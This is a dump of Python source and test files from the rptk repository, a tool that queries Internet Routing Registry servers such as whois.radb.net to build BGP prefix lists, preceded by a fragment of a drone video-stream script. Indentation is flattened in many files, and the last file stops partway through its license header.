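        img = telloGetFrame(myDrone)
        cv2.imshow("Tello", img)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    myDrone.streamoff()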
|
wolcomm/rptk
|
test/test_queries.py
|
<reponame>wolcomm/rptk<filename>test/test_queries.py
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk query class test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import importlib
from helpers import available_policies, default_query_classes, objects
import pytest
class TestQueryClass(object):
"""Test cases for rptk query classes."""
@pytest.mark.parametrize("path", default_query_classes().values())
@pytest.mark.parametrize("policy", available_policies().keys())
@pytest.mark.parametrize("objects", objects())
def test_query_class(self, posix, path, policy, objects, validate_schema):
"""Test rptk query class."""
mod_path, cls_name = path.rsplit(".", 1)
mod = importlib.import_module(mod_path)
cls = getattr(mod, cls_name)
with cls(host="whois.radb.net", port=43, policy=policy) as q:
if q.posix_only and not posix:
pytest.skip("skipping posix only test")
result = q.query(*objects)
assert validate_schema(result, "get_prefix_list.schema")
|
wolcomm/rptk
|
rptk/query/native.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query.native module."""
from __future__ import print_function
from __future__ import unicode_literals
import ipaddress
import re
import socket
from rptk.__meta__ import __version__ as version
from rptk.query import BaseQuery
try:
unicode
except NameError:
unicode = str
class NativeQuery(BaseQuery):
"""Performs queries directly over python sockets."""
_regexp = re.compile(r'(?P<state>[ACDEF])(?P<len>\d*)(?P<msg>[\w\s]*)$')
_keepalive = True
def __enter__(self):
"""Set up a TCP connection."""
self.log_ready_start()
self._connect()
self.log_ready_done()
return self
def __exit__(self, typ, value, traceback):
"""Tear down the connection."""
self.log_exit_start()
self._disconnect()
self.log_exit_done()
def query(self, *objects):
"""Execute a query."""
objects = super(NativeQuery, self).query(*objects)
result = dict()
for obj in objects:
tmp = dict()
sets = {u'ipv4': set(), u'ipv6': set()}
self.log.debug(msg="trying to get members of {}".format(obj))
members = self._members(obj=obj)
for member in members:
self.log.debug(msg="trying to get routes for {}"
.format(member))
routes = self._routes(obj=member)
for af in routes:
sets[af].update(routes[af])
for af, s in sets.items():
prefixes = sorted(list(s))
tmp[af] = [{u'prefix': p.with_prefixlen, u'exact': True}
for p in prefixes]
self.log.debug(msg="found {} {} prefixes for object {}"
.format(len(s), af, obj))
result.update({obj: tmp})
self.log_method_exit(method=self.current_method)
return result
def _connect(self):
"""Establish a TCP connection to the IRR server."""
self.log.debug(msg="creating socket")
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.log.debug(msg="trying to connect to {}".format(self.target))
try:
self._socket.connect((self.host, self.port))
except socket.error as e:
self.log.error(msg="{}".format(e))
raise e
self.log.debug(msg="socket connected")
if self._keepalive:
self._socket.send(b'!!\n')
self._query('!nRPTK-{}'.format(version))
def _disconnect(self):
"""Tear the TCP connection down."""
self.log.debug(msg="disconnecting socket")
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self.log.debug(msg="socket closed")
    def _query(self, q, skip_errors=()):
q += '\n'
q = q.encode()
total_sent = 0
query_length = len(q)
while total_sent < query_length:
sent = self._socket.send(q[total_sent:])
if not sent:
self.raise_runtime_error(msg="socket connection broken")
total_sent += sent
self.log.debug(msg="sent query {} (length {} bytes)"
.format(q.rstrip(), total_sent))
chunks = []
chunk_size = 4096
chunk = self._socket.recv(chunk_size)
response, chunk = chunk.split(b'\n', 1)
try:
response_length = self._parse_response(response)
except IRRQueryError as e:
if type(e) in skip_errors:
self.log.debug(msg="{}".format(e))
response_length = False
else:
self.log.error(msg="{}".format(e))
raise e
if not response_length:
return
total_rcvd = len(chunk) or 0
chunks.append(chunk)
while total_rcvd <= response_length:
self.log.debug(msg="received {} of {} bytes"
.format(total_rcvd, response_length))
chunk = self._socket.recv(chunk_size)
if chunk == b'':
self.raise_runtime_error(msg="socket connection broken")
chunks.append(chunk)
total_rcvd += len(chunk)
self.log.debug(msg="received {} of {} bytes"
.format(total_rcvd, response_length))
suffix = chunks[-1][-(total_rcvd - response_length):]
chunks[-1] = chunks[-1][:-len(suffix)]
self.log.debug("suffix length: {}".format(len(suffix)))
return ''.join(c.decode() for c in chunks)
def _parse_response(self, response):
"""Check response code and return response data length."""
self.log.debug("received response {}".format(response))
response = response.decode()
match = self._regexp.match(response)
if not match:
self.raise_runtime_error("invalid response '{}'".format(response))
state = match.group('state')
if state == 'A':
length = int(match.group('len'))
self.log.debug(msg="query successful: {} bytes of data"
.format(length))
return length
elif state == 'C':
self.log.debug(msg="query successful. no data.")
return False
elif state == 'D':
raise KeyNotFoundError()
elif state == 'E':
raise KeyNotUniqueError()
elif state == 'F':
if match.group('msg'):
msg = match.group('msg').strip()
else:
msg = 'unknown error'
raise OtherError(msg)
raise RuntimeError("invalid response '{}'".format(response))
def _members(self, obj=None):
"""Resolve an as-set to its members."""
q = "!i{},1".format(obj)
members = self._query(q, skip_errors=(KeyNotFoundError,))
if members:
members = members.split()
self.log.debug("found {} members of {}".format(len(members), obj))
return members
else:
self.log.debug("no members of {} found. treating as autnum."
.format(obj))
return [obj]
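    # Example (illustrative): _members(obj="AS-EXAMPLE") sends the irrd
    # command "!iAS-EXAMPLE,1", asking for a recursively expanded member
    # list; a plain autnum such as "AS65000" has no members and is returned
    # unchanged as a single-element list.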
def _routes(self, obj=None):
"""Get routes for specified object."""
proto = {
u'ipv4': {'cmd': '!g', 'class': ipaddress.IPv4Network},
u'ipv6': {'cmd': '!6', 'class': ipaddress.IPv6Network}
}
routes = dict()
for af in proto:
cmd = proto[af]['cmd']
cls = proto[af]['class']
q = "{}{}".format(cmd, obj)
routes[af] = list()
resp = self._query(q, skip_errors=(KeyNotFoundError,))
if resp:
for each in resp.split():
try:
routes[af].append(cls(unicode(each)))
except (ipaddress.AddressValueError,
ipaddress.NetmaskValueError):
self.log.warning(msg="converting {} to {} failed"
.format(each, cls))
self.log.debug(msg="found {} {} prefixes for object {}"
.format(len(routes[af]), af, obj))
return routes
class IRRQueryError(RuntimeError):
"""Exception raised during query execution."""
proto_msg = ''
def __init__(self, *args, **kwargs):
"""Initialise the Exception instance."""
super(IRRQueryError, self).__init__(self.proto_msg, *args, **kwargs)
class KeyNotFoundError(IRRQueryError):
"""The RPSL key was not found."""
proto_msg = "Key not found. (D)"
class KeyNotUniqueError(IRRQueryError):
"""There are multiple copies of the key in one database. (E)."""
proto_msg = "There are multiple copies of the key in one database. (E)"
class OtherError(IRRQueryError):
"""An unknown error occured during query execution."""
proto_msg = "Some other error, see the <optional message> for details."
|
wolcomm/rptk
|
test/test_cli.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk CLI test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import re
import sys
from helpers import (objects)
import pytest
args = (
[],
["--debug"],
["--version"],
["--policy=strict", "--query=bgpq3", "--format=yaml"]
)
version_regexp = re.compile(r"^rptk version \d+\.\d+\.\d+(-\w+\.\d+)?$")
@pytest.mark.usefixtures("mock_query_classes")
class TestCLI(object):
"""Test cases for rptk command-line tool."""
@pytest.mark.parametrize("args", args)
@pytest.mark.parametrize("objects", objects())
def test_cli(self, capsys, cli_entry_point, args, objects):
"""Test rptk command-line tool."""
sys.argv[0] = "rptk"
argv = args + list(objects)
try:
cli_entry_point(argv=argv)
except SystemExit as exit:
captured = capsys.readouterr()
assert exit.code == 0
for obj in objects:
if "--version" in args:
assert version_regexp.match(captured.out)
else:
assert obj in captured.out
|
wolcomm/rptk
|
rptk/query/__init__.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query module."""
from __future__ import print_function
from __future__ import unicode_literals
from rptk.base import BaseObject
try:
basestring
except NameError:
basestring = str
try:
unicode
except NameError:
unicode = str
class BaseQuery(BaseObject):
"""Base class for the definition of query execution classes."""
posix_only = False
def __init__(self, **opts):
"""Initialise new object."""
super(BaseQuery, self).__init__()
self.log_init()
self._opts = opts
self.log_init_done()
def query(self, *objects):
"""Check the object name type."""
self.log_method_enter(method=self.current_method)
for obj in objects:
if not isinstance(obj, basestring):
self.raise_type_error(arg=obj, cls=basestring)
obj = unicode(obj)
yield obj
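    # Note (illustrative): query() is a generator; concrete subclasses call
    # objects = super(...).query(*objects) and iterate over the validated,
    # unicode-coerced object names, as NativeQuery.query() does.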
@property
def host(self):
"""Get the configured IRR server hostname."""
return self.opts["host"]
@property
def port(self):
"""Get the configured IRR server port."""
return int(self.opts["port"])
@property
def target(self):
"""Construct a hostname:port pair for the IRR server."""
return "{}:{}".format(self.host, self.port)
|
wolcomm/rptk
|
test/test_web.py
|
<reponame>wolcomm/rptk
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk web-api test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import logging
import re
from helpers import default_format_classes, objects
import pytest
import yaml
try:
from yaml import CLoader as Loader
except ImportError as e:
logging.getLogger(__name__).warning("%s", e, exc_info=True)
from yaml import Loader
server_re = re.compile(r"^rptk-web/\d+\.\d+\.\d+(-\w+\.\d+)?$")
@pytest.mark.usefixtures("mock_query_classes")
class TestWebAPI(object):
"""Test cases for rptk web API."""
def test_get_formats(self, client, validate_schema):
"""Test get_formats method."""
uri = "/formats"
with client() as c:
resp = c.get(uri)
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert server_re.match(resp.headers["Server"])
data = resp.json
assert validate_schema(data, "get_formats.schema")
def test_get_policies(self, client, validate_schema):
"""Test get_policies method."""
uri = "/policies"
with client() as c:
resp = c.get(uri)
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert server_re.match(resp.headers["Server"])
data = resp.json
assert validate_schema(data, "get_policies.schema")
@pytest.mark.parametrize("f", default_format_classes().keys())
@pytest.mark.parametrize("objects", objects())
def test_get_prefix_list(self, client, validate_schema, f, objects):
"""Test get_prefix_list method."""
base_uris = [
"/query?format={}".format(f),
"/{}/query?".format(f)
]
uris = list()
for uri in base_uris:
for obj in objects:
uri += "&objects={}".format(obj)
uris.append(uri)
if len(objects) == 1:
uris.append("/{}/{}".format(f, objects[0]))
print("uris: {}".format(uris))
for uri in uris:
with client() as c:
resp = c.get(uri)
assert resp.status_code == 200
assert server_re.match(resp.headers["Server"])
if f == "json":
assert resp.content_type == "application/json"
data = resp.json
assert validate_schema(data, "get_prefix_list.schema")
elif f == "yaml":
assert resp.content_type == "application/x-yaml"
data = yaml.load(resp.data, Loader=Loader)
assert validate_schema(data, "get_prefix_list.schema")
else:
assert resp.content_type == "text/plain"
for obj in objects:
assert obj in resp.data.decode()
|
wolcomm/rptk
|
rptk/load.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk load module."""
from __future__ import print_function
from __future__ import unicode_literals
import collections
import importlib
from rptk.base import BaseObject
class ClassLoader(BaseObject):
"""ClassLoader to dynamically load query and format classes."""
def __init__(self, items=None):
"""Initialise a new ClassLoader object."""
super(ClassLoader, self).__init__()
self.log_init()
if not isinstance(items, collections.Iterable):
raise TypeError("{} not of type {}"
.format(items, collections.Iterable))
self._classes = dict()
self.log.debug(msg="trying to load classes")
for name, path in items:
mod_path, cls_path = path.rsplit(".", 1)
self.log.debug(msg="loading class {}".format(cls_path))
try:
cls = getattr(importlib.import_module(mod_path), cls_path)
except ImportError as e:
self.log.warning(msg="{}".format(e))
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self._classes.update({name: cls})
self.log.debug(msg="loaded {} classes".format(len(self._classes)))
self.log_init_done()
def get_class(self, name=None):
"""Get the named class."""
return self._classes[name]
@property
def class_names(self):
"""Get a list of avalable class names."""
return [name for name in self._classes]
@property
def classes(self):
"""Get a list of available classes."""
return [self.get_class(name) for name in self.class_names]
@property
def class_info(self):
"""Get a mapping of class names to descriptions."""
info = dict()
for name in self._classes:
descr = None
try:
descr = self.get_class(name=name).description
except AttributeError as e:
self.log.debug(msg="{}".format(e))
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
info.update({name: {
'description': descr
}})
return info
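# Minimal usage sketch (illustrative, not part of the original module):
#   loader = ClassLoader(items=[("json", "rptk.format.jsonf.JsonFormat")])
#   loader.class_names             # -> ["json"]
#   loader.get_class(name="json")  # -> <class 'rptk.format.jsonf.JsonFormat'>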
|
wolcomm/rptk
|
rptk/query/bgpq3/_sync.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query.bgpq3.sync module."""
from __future__ import print_function
from __future__ import unicode_literals
import json
import subprocess
from rptk.query import BaseQuery
from whichcraft import which
class _Bgpq3QuerySync(BaseQuery):
"""Performs queries using bgpq3."""
posix_only = True
def query(self, *objects):
"""Execute a query."""
objects = super(_Bgpq3QuerySync, self).query(*objects)
if not self.path:
msg = "couldn't determine bgpq3 executable path"
self.log.error(msg=msg)
raise RuntimeError(msg)
try:
policy = self.opts["policy"]
except KeyError:
policy = None
all_cmds = self._construct_cmds(objects=objects, policy=policy)
result = self._run_cmds(all_cmds=all_cmds)
self.log_method_exit(method=self.current_method)
return result
def _construct_cmds(self, objects, policy):
"""Construct bgpq3 command sets for query."""
self.log_method_enter(method=self.current_method)
cmds = dict()
for obj in objects:
self.log.debug(msg="constructing commands for "
"object={}, policy={}".format(obj, policy))
if policy == "loose":
cmds.update({obj: {'ipv4': [self.path, "-h", self.target,
"-l", "ipv4", "-m", "24",
"-r", "8", "-R", "24", "-4Aj",
obj],
'ipv6': [self.path, "-h", self.target,
"-l", "ipv6", "-m", "48",
"-r", "16", "-R", "48", "-6Aj",
obj]}})
else:
cmds.update({obj: {'ipv4': [self.path, "-h", self.target,
"-l", "ipv4", "-m", "24", "-4Aj",
obj],
'ipv6': [self.path, "-h", self.target,
"-l", "ipv6", "-m", "48", "-6Aj",
obj]}})
self.log_method_exit(method=self.current_method)
return cmds
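    # Example (illustrative): with the default strict policy and an object
    # "AS-EXAMPLE", the ipv4 command built above is equivalent to running:
    #   bgpq3 -h whois.radb.net:43 -l ipv4 -m 24 -4Aj AS-EXAMPLE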
def _run_cmds(self, all_cmds):
"""Spawn bgpq3 subprocesses and return query results."""
self.log_method_enter(method=self.current_method)
result = dict()
for obj, cmds in all_cmds.items():
result[obj] = dict()
for cmd in cmds.values():
self.log.debug(msg="running {}".format(" ".join(cmd)))
output = self._run_cmd(cmd)
result[obj].update(json.loads(output))
self.log_method_exit(method=self.current_method)
return result
def _run_cmd(self, cmd):
"""Spawn a subprocess and return the contents of stdout."""
self.log_method_enter(method=self.current_method)
try:
output = subprocess.check_output(cmd, universal_newlines=True)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return output
@property
def path(self):
"""Find the path of the bgpq3 executable."""
self.log.debug(msg="determining bgpq3 executable path")
try:
return self.opts["bgpq3_path"]
except KeyError:
self.log.debug(msg="no configured path, using system default")
return which("bgpq3")
|
wolcomm/rptk
|
test/conftest.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Fixtures for rptk test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import importlib
import ipaddress
import json
import os
import jsonschema
from pkg_resources import load_entry_point
import pytest
@pytest.fixture
def mock_query_classes(monkeypatch):
"""Monkeypatch query classes for testing."""
from rptk import RptkAPI
from rptk.query import BaseQuery
class _MockQuery(BaseQuery):
def query(self, *objects):
objects = super(self.__class__, self).query(*objects)
result = dict()
data_dir = os.path.join(os.path.dirname(__file__), "data")
for obj in objects:
with open(os.path.join(data_dir, "{}.json".format(obj))) as f:
result.update(json.load(f))
return result
for path in RptkAPI.default_query_classes.values():
mod_path, cls_name = path.rsplit(".", 1)
mod = importlib.import_module(mod_path)
monkeypatch.setattr(mod, cls_name, _MockQuery)
@pytest.fixture(scope="module")
def cli_entry_point():
"""Get the entry point function for the rptk command-line tool."""
return load_entry_point(dist="rptk", group="console_scripts", name="rptk")
@pytest.fixture(scope="module")
def client():
"""Get test http client."""
from rptk.web import app
return app.test_client
@pytest.fixture(scope="session") # noqa: C901
def format_checker():
"""Get a custom format_checker instance."""
format_checker = jsonschema.FormatChecker()
def coerce_to_unicode(value):
try:
value = unicode(value)
except (ValueError, NameError):
pass
return value
@format_checker.checks("ipv4-prefix", raises=ValueError)
def is_ipv4_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv4Network(instance, strict=True)
return True
except Exception:
return False
@format_checker.checks("ipv6-prefix", raises=ValueError)
def is_ipv6_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv6Network(instance, strict=True)
return True
except Exception:
return False
@format_checker.checks("ipv4-address-prefix", raises=ValueError)
def is_ipv4_address_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv4Network(instance, strict=False)
return True
except Exception:
return False
@format_checker.checks("ipv6-address-prefix", raises=ValueError)
def is_ipv6_address_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv6Network(instance, strict=False)
return True
except Exception:
return False
return format_checker
@pytest.fixture(scope="session")
def validate_schema(format_checker):
"""Return a callable that will validate data against a schema."""
def _validate(data, schema_file):
schema_dir = os.path.join(os.path.dirname(__file__), "schemas")
with open(os.path.join(schema_dir, schema_file)) as f:
schema = json.load(f)
jsonschema.validate(instance=data, schema=schema,
format_checker=format_checker)
return True
return _validate
@pytest.fixture(scope="session")
def posix():
"""Check whether we are on a POSIX system."""
return os.name == "posix"
|
wolcomm/rptk
|
test/test_loader.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk class loader test cases."""
from __future__ import print_function
from __future__ import unicode_literals
from helpers import default_format_classes, default_query_classes
import pytest
from rptk.base import BaseObject
class_sets = (
default_query_classes().items(),
default_format_classes().items(),
)
class TestClassLoader(object):
"""Test cases for rptk class loader classes."""
@pytest.mark.parametrize("class_set", class_sets)
def test_class_loader(self, class_set):
"""Test rptk class loader."""
from rptk.load import ClassLoader
loader = ClassLoader(items=class_set)
assert isinstance(loader.class_names, list)
for name, path in class_set:
assert name in loader.class_names
assert name in loader.class_info
assert loader.class_info[name]
assert issubclass(loader.get_class(name=name), BaseObject)
assert isinstance(loader.classes, list)
for cls in loader.classes:
assert isinstance(cls, type)
|
wolcomm/rptk
|
rptk/api.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk API module."""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
try:
import configparser
except ImportError:
import ConfigParser as configparser # noqa: N813
import os
import sys
from rptk.__meta__ import __version__
from rptk.base import BaseObject
from rptk.load import ClassLoader
class Rptk(BaseObject):
"""rptk API class."""
version = __version__
available_policies = {
"strict": "Permit only prefixes with explicitly registered 'route' or "
"'route6' objects",
"loose": "Permit prefixes shorter than /24 (ipv4) or /48 (ipv6) with "
"a registered covering 'route' or 'route6' object"
}
default_query_classes = {
"native": "rptk.query.native.NativeQuery",
"bgpq3": "rptk.query.bgpq3.Bgpq3Query"
}
default_format_classes = {
"json": "rptk.format.jsonf.JsonFormat",
"yaml": "rptk.format.yamlf.YamlFormat",
"plain": "rptk.format.plain.PlainFormat",
"ios": "rptk.format.ios.IosFormat",
"ios_null": "rptk.format.ios_null.IosNullFormat",
"junos": "rptk.format.junos.JunosFormat",
"bird": "rptk.format.bird.BirdFormat",
}
def __init__(self, config_file=None, **kwargs):
"""Initialise API object."""
super(self.__class__, self).__init__()
self.log_init()
self.log.debug(msg="creating options namespaces")
self._options = {
"query_": argparse.Namespace(host="whois.radb.net", port=43,
policy="strict"),
"format_": argparse.Namespace()
}
self.log.debug(msg="determining config file location")
self._config_file = config_file or self._find_config_file()
if self.config_file:
self.log.debug(msg="reading config file at {}"
.format(self.config_file))
reader = self._read_config()
else:
self.log.debug(msg="no config file provided: using default values")
reader = None
if reader and reader.has_section("query-classes"):
self.log.debug("found 'query-classes' section in config file")
query_classes = reader.items(section="query-classes")
else:
query_classes = self.default_query_classes.items()
if reader and reader.has_section("format-classes"):
self.log.debug("found 'format-classes' section in config file")
format_classes = reader.items(section="format-classes")
else:
format_classes = self.default_format_classes.items()
self.log.debug(msg="getting dynamic class loaders")
self._query_class_loader = ClassLoader(items=query_classes)
self._format_class_loader = ClassLoader(items=format_classes)
if reader:
self.log.debug(msg="setting configuration file options")
if reader.has_option("defaults", "query_class"):
query_class_name = reader.get("defaults", "query_class")
self.log.debug(msg="setting query_class_name = {}"
.format(query_class_name))
self.query_class_name = query_class_name
for key, value in reader.items("query"):
self.log.debug(msg="setting query_{} = {}".format(key, value))
setattr(self.query_options, key, value)
if reader.has_option("defaults", "format_class"):
format_class_name = reader.get("defaults", "format_class")
self.log.debug(msg="setting format_class_name = {}"
.format(format_class_name))
self.format_class_name = format_class_name
for key, value in reader.items("format"):
self.log.debug(msg="setting format_{} = {}".format(key, value))
setattr(self.format_options, key, value)
self.log.debug(msg="updating options with user supplied values")
self.update(**kwargs)
self.log_init_done()
@property
def query_class_loader(self):
"""Get query class loader object."""
return self._query_class_loader
@property
def format_class_loader(self):
"""Get format class loader object."""
return self._format_class_loader
@property
def query_class_name(self):
"""Get configured query class name."""
if "native" in self.query_class_loader.class_names:
default = "native"
else:
default = self.query_class_loader.class_names[0]
return getattr(self, "_query_class_name", default)
@query_class_name.setter
def query_class_name(self, value):
"""Configure query class name."""
if value is None:
try:
del(self._query_class_name)
except AttributeError:
pass
elif value in self.query_class_loader.class_names:
self._query_class_name = value
else:
self.raise_runtime_error(msg="query class '{}' is not loaded"
.format(value))
@property
def format_class_name(self):
"""Get configured format class name."""
if "json" in self.format_class_loader.class_names:
default = "json"
else:
default = self.format_class_loader.class_names[0]
return getattr(self, "_format_class_name", default)
@format_class_name.setter
def format_class_name(self, value):
"""Configure format class name."""
if value is None:
try:
del(self._format_class_name)
except AttributeError:
pass
elif value in self.format_class_loader.class_names:
self._format_class_name = value
else:
self.raise_runtime_error(msg="format class '{}' is not loaded"
.format(value))
@property
def query_class(self):
"""Get the configured query class."""
return self.query_class_loader.get_class(name=self.query_class_name)
@property
def format_class(self):
"""Get the configured format class."""
return self.format_class_loader.get_class(name=self.format_class_name)
@property
def query_options(self):
"""Get query_options."""
return self._options["query_"]
@property
def format_options(self):
"""Get format opts."""
return self._options["format_"]
@staticmethod
def _find_config_file():
"""Search for a config file at default locations."""
dirs = [
os.path.join(os.path.join(sys.prefix, "etc"), "rptk"),
os.path.dirname(os.path.realpath(__file__))
]
for dir in dirs:
path = os.path.join(dir, "rptk.conf")
if os.path.isfile(path):
return path
return None
def _read_config(self):
"""Read the config file."""
self.log_method_enter(method=self.current_method)
reader = configparser.SafeConfigParser()
self.log.debug(
msg="trying to read configuration from file {}"
.format(self.config_file)
)
try:
reader.read(self.config_file)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return reader
@property
def config_file(self):
"""Get config file path."""
return self._config_file
def update(self, **kwargs):
"""Update self.opts from keyword args."""
self.log_method_enter(method=self.current_method)
for key, value in kwargs.items():
for prefix, namespace in self._options.items():
if key.startswith(prefix):
self.log.debug(msg="setting {} = {}".format(key, value))
if key.endswith("_class_name"):
setattr(self, key, value)
else:
                        setattr(namespace, key[len(prefix):], value)  # strip the exact prefix; lstrip would strip a character set
self.log_method_exit(method=self.current_method)
return self
def query(self, *objects):
"""Perform a query and return the formatted output."""
self.log_method_enter(method=self.current_method)
self.log.debug(msg="trying to begin query")
self.log.debug(msg="instantiating {} object with options {}"
.format(self.query_class.__name__,
self.query_options))
with self.query_class(**vars(self.query_options)) as q:
result = q.query(*objects)
self.log_method_exit(method=self.current_method)
return result
def format(self, result=None):
"""Output string representation of result using a format class."""
self.log_method_enter(method=self.current_method)
self.log.debug(msg="trying to format result for output")
self.log.debug(msg="instantiating {} object with options {}"
.format(self.format_class.__name__,
self.format_options))
with self.format_class(**vars(self.format_options)) as f:
output = f.format(result=result)
self.log_method_exit(method=self.current_method)
return output
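# Minimal usage sketch (illustrative, not part of the original module):
#   api = Rptk(query_host="whois.radb.net", format_class_name="json")
#   result = api.query("AS-EXAMPLE")
#   print(api.format(result=result))
# Keyword arguments prefixed with "query_" or "format_" are routed to the
# matching options namespace by update() above.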
|
wolcomm/rptk
|
rptk/query/bgpq3/_async.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query.bgpq3.async module."""
from __future__ import print_function
from __future__ import unicode_literals
import asyncio
import collections
import json
from rptk.query.bgpq3._sync import _Bgpq3QuerySync
class _Bgpq3QueryAsync(_Bgpq3QuerySync):
"""Performs queries using bgpq3."""
def _run_cmds(self, all_cmds):
"""Spawn bgpq3 subprocesses and return query results."""
self.log_method_enter(method=self.current_method)
result = collections.defaultdict(dict)
semaphore = asyncio.Semaphore(value=self.max_concurrency)
loop = asyncio.get_event_loop()
tasks = list()
for obj, cmds in all_cmds.items():
for af, cmd in cmds.items():
tasks.append(self._run_cmd(semaphore, obj, af, cmd))
cmd_results = loop.run_until_complete(asyncio.gather(*tasks))
for obj, af, output in cmd_results:
result[obj].update(json.loads(output))
self.log_method_exit(method=self.current_method)
return dict(result)
async def _run_cmd(self, semaphore, obj, af, cmd): # noqa: E999
"""Spawn a subprocess and return the contents of stdout."""
self.log_method_enter(method=self.current_method)
try:
async with semaphore:
self.log.debug(msg="running {}".format(" ".join(cmd)))
proc = await asyncio.create_subprocess_exec(
*cmd, stdout=asyncio.subprocess.PIPE
)
self.log.debug(msg="started {}".format(" ".join(cmd)))
stdout, stderr = await proc.communicate()
await proc.wait()
self.log.debug(msg="done {}".format(" ".join(cmd)))
output = stdout.decode()
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return (obj, af, output)
@property
def max_concurrency(self):
"""Get the maximum allowed number of simulateously running queries."""
try:
return self.opts["max_concurrency"]
except KeyError:
return 4
|
wolcomm/rptk
|
rptk/command_line.py
|
<filename>rptk/command_line.py
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
